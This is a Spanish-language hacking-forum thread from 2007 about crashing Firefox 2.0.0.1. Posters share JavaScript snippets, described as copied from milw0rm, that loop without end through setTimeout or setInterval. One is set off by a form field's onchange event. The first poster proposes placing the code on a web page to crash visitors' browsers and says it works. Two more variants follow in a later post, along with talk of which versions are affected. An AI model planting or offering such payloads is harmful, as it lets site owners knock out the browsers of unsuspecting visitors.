Firefox 2.0.0.1 Denial Of Services

Started by kazin, January 08, 2007, 01:23:22 AM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

Print
Go Down Pages1
User actions

kazin

January 08, 2007, 01:23:22 AM
Utilize el buscador para ver si ya estaba esto... pero no encontro nada... asi que lo posteo:

Aparentemente con incluir este code en nuestra web podemos ocacionar DoS en firefox 2.0.0....

El code es el siguiente:

Code Select
<script>
function owned(){

setTimeout("owned()",1000);
owned();
}
</script>
<input type="foo" size="30" id="bar" onchange="owned()">

Probado... funciona correctamente...

ElecBoy

#1
January 08, 2007, 01:49:51 AM
Bueno pero estas seguro que en la version 2.0.0.1 funciona?
-[ElecBoy]
HackPR.NET


"Tell me and I forget.  Teach me and I remember.  Involve me and I learn."        
                                     — Benjamin Franklin

kazin

#2
January 08, 2007, 01:55:14 AM
Quote from: ElecBoy on January 08, 2007, 01:49:51 AM
Bueno pero estas seguro que en la version 2.0.0.1 funciona?

Boss estube investigando... aparentemente funciona correctamente... vi muchisimos comentarios afirmativos del exploit... tambien encontre esto:

Code Select
<script>
function loop(){
setTimeout("loop()",1000);
loop();
}
loop();
</script>

Code Select
<script>
function loop(){
setInterval("loop()",1000);
loop();
}
loop();
</script>


La fuente es milw0rm... asi que apuesto a que funciona...

ElecBoy

#3
January 21, 2007, 03:41:19 AM
EL tema ya tiene un tiempo de haber sido publicado pero si es Vulnerable con la version 2.0.0.1 de FireFox por ende tambien lo es con 1.5.9
-[ElecBoy]
HackPR.NET


"Tell me and I forget.  Teach me and I remember.  Involve me and I learn."        
                                     — Benjamin Franklin
Print
Go Up Pages1
User actions